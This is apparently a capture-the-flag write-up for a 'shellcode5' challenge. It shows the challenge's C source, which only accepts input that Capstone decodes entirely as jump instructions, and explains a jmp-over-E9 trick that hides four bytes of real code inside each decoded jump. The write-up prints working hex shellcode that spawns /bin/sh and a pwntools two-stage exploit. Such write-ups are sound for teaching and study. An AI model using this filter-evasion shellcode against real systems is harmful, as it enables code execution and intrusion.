summer2024_機器碼

Jexy-kynner*^發表於2024-07-30

shellcode5

#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#include <capstone/capstone.h>
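/*
 * Turn off stdio buffering on stdin/stdout so the challenge talks to the
 * client byte-for-byte (the usual CTF service setup).
 *
 * Returns 0. The original was declared `int` but fell off the end without a
 * return value, which -Wreturn-type flags; callers ignore the result.
 */
int upkeep() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    return 0;
}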
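/*
 * Accept `len` bytes at `ptr` only if Capstone's linear-sweep x86-64
 * disassembly decodes them as a run of instructions whose mnemonics all
 * begin with 'j' (jmp, jcc, jrcxz, ...) and whose sizes add up to exactly
 * `len` (i.e. the sweep did not stop early on an undecodable byte).
 *
 * Returns 1 when the input passes, 0 when it fails or Capstone cannot be
 * opened.
 *
 * NOTE(review): a linear sweep sees only one decoding of the byte stream,
 * not the instruction stream that actually executes. A 2-byte `jmp +1`
 * (EB 01) followed by an E9 opcode makes the sweep consume the next four
 * bytes as the rel32 displacement of a 5-byte `jmp`, while at run time the
 * short jump lands on those four bytes and executes them as arbitrary code.
 * This filter therefore constrains what the disassembler reports, not what
 * runs; it is a gate on syntax, not on behaviour.
 */
int validate(char* ptr, size_t len) {
    csh handle;
    cs_insn *insn;
    int ret = 1;
    if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
        return 0;
    }
    /* address 0, count 0: decode as many instructions as the bytes allow */
    size_t count = cs_disasm(handle, (const uint8_t *)ptr, len, 0, 0, &insn);
    if (count == 0) {
        /* nothing decodable at all; close the handle (the original leaked
         * it on this path) */
        cs_close(&handle);
        return 0;
    }
    size_t success_len = 0;
    for (size_t j = 0; j < count; j++) {
        ret &= insn[j].mnemonic[0] == 'j';
        success_len += insn[j].size;
    }
    cs_free(insn, count);
    cs_close(&handle);
    /* reject if the sweep stopped before the end of the buffer */
    ret &= len == success_len;
    return ret;
}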
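/*
 * Read up to 4096 bytes from stdin into a stack buffer, run them through
 * validate(), and on success jump into the buffer.
 *
 * No mprotect()/mmap() call is made anywhere in this listing even though
 * <sys/mman.h> is included, so executing `code` relies on the stack being
 * executable (presumably the binary is linked with -z execstack; that is
 * not visible here). The buffer is never NUL-terminated, which is fine
 * because validate() receives the exact byte count.
 */
int main() {
    upkeep();
    char code[4096];
    /* read(2) returns ssize_t. Storing -1 into a size_t would satisfy
     * `n > 0` and hand validate() a near-SIZE_MAX length, so it could walk
     * far past the 4096-byte buffer. Keep the signed type. */
    ssize_t n = read(0, code, sizeof code);
    if (n > 0 && validate(code, (size_t)n)) {
        /* A single read(2) may return fewer bytes than the peer sent; the
         * payload is expected to arrive in one chunk. */
        ((void (*)())code)();
    }
    return 0;
}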

要滿足的條件是：shellcode 被 Capstone 線性反彙編後，每一條指令的助記符都必須以 j 開頭（jmp / jcc 等），而且各指令長度加總要剛好等於輸入長度，否則 validate() 回傳 0。

所以每 4 位元組的真正 shellcode 前面都先放 `EB 01`（jmp +1，執行時跳過緊接著的那 1 個位元組），再放 1 個 `E9`：反彙編器會把 `E9` 當成 5 位元組的 `jmp rel32`，把後面那 4 位元組當作位移量「吃掉」，於是它看到的全部都是 jmp；但實際執行時短跳轉直接落在那 4 位元組上，真正的指令就被執行了。每段因此必須剛好 4 位元組，不夠的用 `90`（nop）補齊。

EB 01 E9 48 31 FF 90
EB 01 E9 48 31 F6 90
EB 01 E9 48 31 D2 90
EB 01 E9 48 31 C0 90
EB 01 E9 48 31 DB 90
EB 01 E9 50 90 90 90
EB 01 E9 B3 68 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 73 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 6E 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 69 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 62 90 90
EB 01 E9 48 C1 E3 08
EB 01 E9 B3 2F 90 90
EB 01 E9 53 90 90 90
EB 01 E9 48 89 E7 90
EB 01 E9 B0 3B 90 90
EB 01 E9 0F 05 90 90

用 pwntools 組裝的腳本如下（做法相同，只是 stage 1 先用 read 把不受限制的 stage 2 讀進來再執行）

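from pwn import *

elf = ELF("shellcode5")
context.log_level = "debug"
context.binary = elf

# Stage 1 has to survive validate(): every instruction Capstone decodes must
# start with 'j' and the decoded sizes must add up to the input length.
#
# Trick: `EB 01` (jmp +1) hops over a single 0xE9 byte at run time, but the
# linear sweep decodes that 0xE9 as a 5-byte `jmp rel32` and swallows the next
# FOUR bytes as its displacement. Those four bytes are where the real code
# goes, so every chunk must be exactly 4 bytes.
skip = asm("""
jmp here+1
here:
""")


def j_chunk(code: bytes) -> bytes:
    """Wrap exactly 4 bytes of real code so the validator only sees `jmp`s.

    Raises ValueError if `code` is not 4 bytes: a shorter chunk leaves stray
    bytes the sweep decodes as non-jump instructions, and a longer one has its
    tail executed where the next `EB 01` was supposed to be.
    """
    if len(code) != 4:
        raise ValueError(f"chunk must be 4 bytes, got {len(code)}: {code.hex()}")
    return skip + b"\xe9" + code


# Stage 1 performs read(0, <code buffer>, len) to pull an unrestricted stage 2
# over the top of this buffer. Target register state for the syscall:
#   rax = 0 (SYS_read), rdi = 0 (stdin), rsi = buffer, rdx = length
#
# NOTE(review): this relies on rdx pointing at the code buffer when the
# shellcode is entered (presumably observed in gdb for this build); re-check
# if the binary is recompiled.
set_rdi_rsi = asm("""
push rdx
pop rsi
xor edi, edi
""")
# NOTE(review): `mov edx, eax` keeps whatever was in eax's upper three bytes,
# so the count may be much larger than 255; read() still returns only what
# stdin has, so this works as long as the start of the buffer is writable.
set_rdx = asm("""
mov al, 255
mov edx, eax
""")
set_rax_syscall = asm("""
xor eax, eax
syscall
""")

# Original had a bare trailing `+` at a line break here (SyntaxError as
# pasted); build the stage in one expression instead.
first = b"".join(j_chunk(c) for c in (set_rdi_rsi, set_rdx, set_rax_syscall))

p = remote("127.0.0.1", 37251)
# p = process()
# p = elf.debug()

p.send(first)
pause()
# Stage 2 is written from the start of the buffer. The first len(first) bytes
# have already executed, so pad over them; execution resumes right after the
# `syscall`, i.e. at offset len(first), where the /bin/sh shellcode begins.
p.send(b"A" * len(first) + asm(shellcraft.sh()))
p.interactive()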
